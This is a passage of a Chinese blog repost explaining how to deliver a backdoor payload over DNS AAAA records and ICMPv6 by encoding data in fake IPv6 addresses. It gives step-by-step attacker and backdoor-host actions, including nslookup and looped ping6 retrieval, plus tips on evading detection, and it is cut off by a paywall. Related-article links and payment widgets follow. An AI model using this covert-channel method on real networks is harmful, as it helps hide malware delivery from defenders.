利用DNS AAAA记录和IPv6地址传输后门

最新推荐文章于 2024-04-29 09:17:06 发布
最新推荐文章于 2024-04-29 09:17:06 发布
阅读量999 收藏
点赞数
文章标签: 运维 c# 操作系统
原文链接:https://yq.aliyun.com/articles/183166
版权
本文详细介绍了如何通过DNS AAAA记录和ICMPv6进行Payload传输,利用IPv6地址的特殊性在DNS流量中隐藏数据。作者通过两部分展示了如何设置DNS服务器,创建AAAA记录,以及如何利用Ping6响应来提取Payload。同时,文章讨论了如何避免被检测,包括使用多个IPv6地址和DNS轮询。最后,提到了相关工具的C#源代码链接。
摘要由CSDN通过智能技术生成

利用DNS AAAA记录和IPv6地址传输后门

一、前言

在本文中,我想解释如何在DNS流量中利用IPv6地址(AAAA)记录传输Payload。在我之前的文章中,我解释了如何利用DNS和PTR记录,现在我们将讨论AAAA记录。

本文分为两部分:

  • 第一部分:DNS AAAA记录和ICMPv6
  • 第二部分:DNS和AAAA记录(大的DNS AAAA记录响应)

二、DNS AAAA记录和ICMPv6

IPv6地址对于传输Payload非常有用,让我解释下如何完成这个例子。

举个例子,我们有一个IPv6地址如下:

 
 
    
  
  1. fe80:1111:0034:abcd:ef00:ab11:ccf1:0000 
    2. 
 
 
 
这个例子中,我们能将xxxx部分用于我们的Payload。
 
 
 
 
    
  
  1. fe80:1111:xxxx:xxxx:xxxx:xxxx:xxxx:wxyz 
    2. 
 
 
 
我认为我们有两种方式将IPv6地址用于我们的Payload,第一个是我们使用DNS和AAAA记录,第二个是使用这些IPv6地址和DNS AAAA记录,也是Ping6的ICMPv6流量。
 
 
ICMPv6和Ping6:这个例子中,你能通过虚假的IPv6和注入的Payload来改变攻击者的IPv6地址,然后从后门系统中,你能通过循环Ping6得到这些IPv6地址(ICMPv6流量)。
 
 
因此我们有下面这些东西:
 
 
    
  
  • (后门系统)ip地址 = {192.168.1.120}
    • 
  
  • (攻击者系统)ip地址 = {192.168.1.111
    • 
  
  • ,fe80:1111:0034:abcd:ef00:ab11:ccf1:0000}
    • 
  
  • (攻击者系统)DNS名 = test.domain.com,和安装的DNS服务{dnsmasq或dnsspoof}
    • 
 
 
 
DNS AAAA记录和ICMPv6步骤:
 
 
步骤1:(攻击者DNS服务器)record0=>fe80:1111:0034:abcd:ef00:ab11:ccf1:0000 AAAA test.domain.com
 
 
步骤2:(后门系统)==>nslookup test.server.com 192.168.1.111
 
 
步骤3:(后门系统)循环Ping6=>(攻击者系统fe80:1111:0034:abcd:ef00:ab11:ccf1:0000)
 
 
步骤4:(后门系统)通过Ping6响应在IPv6地址中转储出注入的Payload,转储这些部分{0034:abcd:ef00:ab11:ccf1}
 
 
步骤5:(攻击者DNS服务器)record0改为新的test.domain.com
 
 
步骤6:(攻击者DNS服务器)record0=>fe80:1111:cf89:abff:000e:09b1:33b1:0001 AAAA test.domain.com
 
 
步骤6-1:(攻击者系统)通过ifconfig添加或改变NIC IPv6地址{新的IPv6地址:fe80:1111:cf89:abff:000e:09b1:33b1:0001}
 
 
步骤6-2:关于步骤3的ping6的响应=超时或不可达(错误),这个时间是获取新的IPv6地址的标志,或者你的流量被某些东西检测到并阻止了。
 
 
步骤7:(后门系统)=>nslookup test.ser



                

        

        




    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  weixin_34292959
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
使用php调用dnspod的api接口,RouterOS利用DNSPOD的API接口实现DDNS动态解析

				
			

			

				

					weixin_35282700的博客
				

				

					03-16
					
					755
					
				

			

		

		

			
				
本文主要讲解如何借助DNSPOD的API接口来实现RouterOS的DDNS动态解析。一、创建Token添加域名首先域名要在DNSPOD解析,然后在DNSPOD后台开启的API Token。二、PHP制作DNSPODAPI动态解析接口以下是我制作好的php解析接口[break]接口地址:查询接口:链接自动生成接口:HTTP请求方式:POST/GET请求参数:token  (必选) DNSPo...

			
		

	



                

              
                



	

		

			

				
					
给网站添加IPv6 DNS记录

				
			

			

				

					weixin_30569033的博客
				

				

					05-27
					
					464
					
				

			

		

		

			
				
一、
1)
使6box提供的DNS64服务,解析出自己网站对应的IPv6域名
Windows: Win+R打开运行,输入cmd,打开命令提示符,输入以下命令
Nslookupwww.6box.cndns64.6box.cn 
命令中www.6box.cn改成你的网站名称,如果APP里调用了多个子域名,都需要进行转换,如a.6box.cn,b.6box.cn

2)
将...

			
		

	



                


  
              

                


	

		

			

				
					
aaaa

				
			

			

				

					zgos
				

				

					01-24
					
					141
					
				

			

		

		

			
				
aaaa
 

			
		

	





	

		

			

				
					
IPv6 Apache 域名DNS AAAA配置

				
			

			

				

					weixin_30871905的博客
				

				

					04-12
					
					235
					
				

			

		

		

			
				
IPv6 长度:
IPv6是128bit,和MD5一样,对每个IPv6进行MD5,会出现什么情况?MD5用完了?
IPv6 DNS:
未知国家
2001:470:20::2
加拿大
2001:478:6:0:230:48ff:fe22:6a29
英国
2001:7fd::1
日本
2001:dc4::1

Linux优先使用IPv6 DNS:
sudo vi /etc/r...

			
		

	



		

			
		



	

		

			

				
					
DNS解析中的A记录AAAA记录、CNAME记录、MX记录、NS记录、TXT记录、SRV记录、URL转发等

				
			

			

				

					RayPick的博客
				

				

					08-24
					
					8745
					
				

			

		

		

			
				
在任何 DNS 记录文件(Domain Name System (DNS) Zone file)中, 都是以SOA(Start of Authority)记录开始。SOA 资源记录表明此 DNS 名称服务器是为该 DNS 域中的数据的信息的最佳来源。SOA 记录与 NS 记录的区别:简单讲,NS记录表示域名服务器记录,用来指定该域名由哪个DNS服务器来进行解析;

			
		

	





	

		

			

				
					
【攻略】如何将DNS从新网转到DNSPod?

				
			

			

				

					
				

				

					12-22
					
					1791
					
				

			

		

		

			
				
最近新网的大姨妈又开始了,导致了我很多域名无法解析,新网这样频繁出问题实在伤不起啊!我在上一篇文章里也建议在新网注册域名的朋友,将DNS服务器解析换到其他服务商,避免下次因新网dns问题影响客户网站正常使用,我的弄到DNSPOD了,然后将转移的过程中我给大家弄了个教程,希望对那些新手能有所帮助。
1、新网那边的操作,首先登陆新网的管理界面

2、选择[域名管理] 


3、选择 域名状

			
		

	





	

		

			

				
					
内网安全:隧道技术详解

					
最新发布

				
			

			

				

					zz12345600354的博客
				

				

					04-29
					
					1056
					
				

			

		

		

			
				
Block)协议是一种在计算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发,用于在局域网中的计算机之间共享文件和资源,445端口运行打印机共享:SMB协议支持打印机的共享,允许用户在网络中使用共享打印机进行打印操作。通过SMB协议,用户可以连接到其他计算机上的共享打印机,并发送打印任务进行打印。文件共享:SMB协议允许计算机之间共享文件和目录。通过SMB协议,用户可以在网络中访问其他计算机上的共享文件夹,并进行文件的读取、写入和管理操作。

			
		

	





	

		

			

				
					
渗透测试信息收集之域名信息、子域名信息、IP信息、端口信息

				
			

			

				

					yjwangan的博客
				

				

					11-24
					
					2385
					
				

			

		

		

			
				
域名(Domain Name),简称域名、网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位(有时也指地理位置)DNS(域名系统,Domain Name System)是互联网的一项服务它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网顶尖域名二级域名三级域名.combaidu.com政府域名商业域名教育域名.gov.com.edu子域名指二级域名,二级域名是顶级域名(一级域名)的下一级。

			
		

	





	

		

			

				
					
域名监控工具

				
			

			

				

					11-08
				

			

		

		

			
				
这涉及到对域名服务器的通信,获取对应的A记录(IPv4)或AAAA记录IPv6)。  2. **HTTP请求**:除了DNS查询,还可能发送HTTP或HTTPS请求到目标网站,检查返回的状态码。正常情况下,一个健康的网站会返回200(OK)...

			
		

	





	

		

			

				
					
DNS域名解析,以及A、AAAA、CNAME、MX、NS、TXT、SRV、SOA、PTR说明

				
			

			

				

					zzhongcy的专栏
				

				

					05-12
					
					2万+
					
				

			

		

		

			
				
温故知新,最近网上开到相关文章,这里终结记录一下,供大家参考。

			
		

	





	

		

			

				
					
DNS基础之通过dig命令理解DNS域名解析中的A记录AAAA记录,CNAME记录,MX记录,NS记录

				
			

			

				

					zxl1990_ok的博客
				

				

					06-23
					
					8788
					
				

			

		

		

			
				
文中内容参考DNS 原理入门—阮一峰。DNS(Domain Name System) 即域名系统。 作用就是根据域名查出 IP 地址。我们使用(Dig是一个在类Unix命令行模式下查询DNS包括NS记录,A记录,MX记录等相关信息的工具)来显示 DNS的查询过程。 
......

			
		

	





	

		

			

				
					
DNS域名解析中A、AAAA、CNAME、MX、NS、TXT、SRV、SOA、PTR各项记录的作用

				
			

			

				

					我从小酷到大的
				

				

					02-17
					
					3万+
					
				

			

		

		

			
				
          域名注册完成后首先需要做域名解析,域名解析就是把域名指向网站所在服务器的IP,让人们通过注册的域名可以访问到网站。

IP地址是网络上标识服务器的数字地址,为了方便记忆,使用域名来代替IP地址。域名解析就是域名到IP地址的转换过程,域名的解析工作由DNS服务器完成。

DNS服务器会把域名解析到一个IP地址,然后在此IP地址的主机上将一个子目录与域名绑定。域名解析时会添加解析记...

			
		

	





	

		

			

				
					
网络安全大揭秘:AAAA协议的奥秘与应用全解析!

				
			

			

				

					m0_72410588的博客
				

				

					08-15
					
					1856
					
				

			

		

		

			
				
AAAA记录的工作原理与其他DNS记录类型类似,它们都是通过DNS解析器与DNS服务器之间的交互来完成域名解析的过程。当用户输入一个域名时,DNS解析器会向本地DNS服务器发送查询请求,服务器则会根据存储的域名解析记录进行匹配,并将结果返回给解析器,最后解析器将解析结果返回给用户。而AAAA记录则是DNS中的一种重要记录类型,本文将详细介绍AAAA记录的含义、原理、应用场景以及对网络安全的影响。通过配置AAAA记录,用户可以将域名映射到相应的IPv6地址,并实现与IPv6网络的连接。

			
		

	





	

		

			

				
					
DNS:关于 DNS 基本概念的一些笔记整理

				
			

			

				

					山河已无恙
				

				

					04-25
					
					1844
					
				

			

		

		

			
				
分享一些 DNS 的笔记整理博文内容涉及:DNS 历史介绍DNS 解析顺序DNS 基本概念资源类型介绍DNS 安全理解不足小伙伴帮忙指正傍晚时分,你坐在屋檐下,看着天慢慢地黑下去,心里寂寞而凄凉,感到自己的生命被剥夺了。当时我是个年轻人,但我害怕这样生活下去,衰老下去。在我看来,这是比死亡更可怕的事。--------王小波DNS() ,中文名即域名系统,简单理解,即将域名和 IP 地址相互映射的一个分布式数据库,用于域名解析IP地址IP地址反向解析域名。

			
		

	





	

		

			

				
					
DNS全解析

				
			

			

				

					小小郭
				

				

					07-31
					
					7884
					
				

			

		

		

			
				
一.DNS来源最开始世界上的机器比较少,所以都使用host来解析。到后来机器变的多了,改用由中心服务器统一更新host文件,各地的机器通过ftp从中心服务器更新host文件到本地再到后来,机器更多了,只由中心服务器来更新host文件也力不从心了,于是改成分布式的,并逐渐演化到了今天的DNS系统二.DNS服务器分类与域名对应,分根域名服务器,顶级域名服务器和权威服务器。作用如下
  类别
  作用

			
		

	





	

		

			

				
					
dns和常见dns记录类型介绍

					
热门推荐

				
			

			

				

					u013920085的专栏
				

				

					01-09
					
					4万+
					
				

			

		

		

			
				
DNS:(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。使用端口号53。
DNS服务器:用于对域名进行解析的域名解析服务器。
DNS代理:用于代理域名服务器,对客户端的查询请求进行响应(一

			
		

	





	

		

			

				
					

				
			

			

				

					
				

			

		

		

			
				

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值